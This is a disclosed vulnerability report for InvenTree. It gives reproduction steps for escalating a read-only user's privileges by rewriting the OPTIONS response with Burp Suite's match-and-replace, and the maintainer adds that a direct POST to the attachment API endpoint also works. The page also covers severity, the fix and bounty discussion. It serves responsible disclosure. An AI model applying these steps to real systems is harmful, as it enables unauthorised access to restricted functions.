Privilege Escalation via edit response body in inventree/inventree

Valid

Reported on

Jun 17th 2022

Description

Recently, i found a business logic vulnerabity and this vulnerability allow reader user perform privilege escalation on allaccess user. Because before user perform any function, client-side will perform OPTIONS request to view user permission with specify function via response body. If the attacker can manipulate response body, the attacker can modify this response body and access sensitive function.

Step to reproduce

1 - User reader can not perform Add Link function.

image

2 - In Burp suite, Proxy > Options > Match and replace , click Add.

Replace "actions":{"GET":true} with "actions":{"POST":{"pk":{"type":"integer","required":true,"read_only":true,"label":"ID"},"build":{"type":"related field","required":true,"read_only":false,"label":"Build","model":"build","api_url":"/api/build/","filters":{},"help_text":""},"attachment":{"type":"file upload","required":true,"read_only":false,"label":"Attachment","help_text":"Select file to attach"},"link":{"type":"url","required":false,"read_only":false,"label":"Link","help_text":"Link to external URL","max_length":200},"filename":{"type":"string","required":true,"read_only":false,"label":"Filename"},"comment":{"type":"string","required":false,"read_only":false,"label":"Comment","help_text":"File comment","max_length":100},"upload_date":{"type":"date","required":true,"read_only":true,"label":"Upload date","help_text":""},"user":{"type":"related field","required":false,"read_only":false,"label":"User","help_text":"User","model":"user","api_url":"/api/user/","filters":{}},"user_detail":{"type":"nested object","required":true,"read_only":true,"label":"User detail","children":{"pk":{"type":"integer","required":true,"read_only":true,"label":"ID"},"username":{"type":"string","required":true,"read_only":false,"label":"Username","help_text":"Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.","max_length":150},"first_name":{"type":"string","required":false,"read_only":false,"label":"First name","max_length":150,"help_text":""},"last_name":{"type":"string","required":false,"read_only":false,"label":"Last name","max_length":150,"help_text":""},"email":{"type":"email","required":false,"read_only":false,"label":"Email address","max_length":254,"help_text":""}}}},"DELETE":true,"GET":true}

image And click OK.

3 - Try Add link funcion again with reader account, and success!

image

Impact

This vulnerability allow attacker with low privilege can perform high privilege to access sensitive function.

We are processing your report and will contact the inventree team within 24 hours. a year ago
Nhien.IT modified the report
a year ago
Oliver modified the Severity from Critical (9.4) to Medium (6.5) a year ago
Oliver
a year ago

Maintainer

Thanks for reporting this. I have found that there is an even easier way to reproduce this:

Simply navigate to the appropriate API URL e.g. /api/part/attachment/ and an authenticated user who nominally cannot create or edit attachments can issue a POST request against this endpoint. No manipulation of front-end code is required.

We will have a fix out for this ASAP, thanks again for reporting.

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Oliver validated this vulnerability a year ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Oliver marked this as fixed in 0.8.0 with commit 12fccc a year ago
Oliver has been awarded the fix bounty
This vulnerability will not receive a CVE
Nhien.IT
a year ago

Researcher

Hi @mainter,

any bounty for this vulnerability?

Nhien.IT
a year ago

Researcher

Hi @maintainer, the fix is already released, can you assign a CVE here? if you can, hope @admin help

Jamie Slome
a year ago

Admin

We can assign and publish a CVE with the permission of the @maintainer 👍

to join this conversation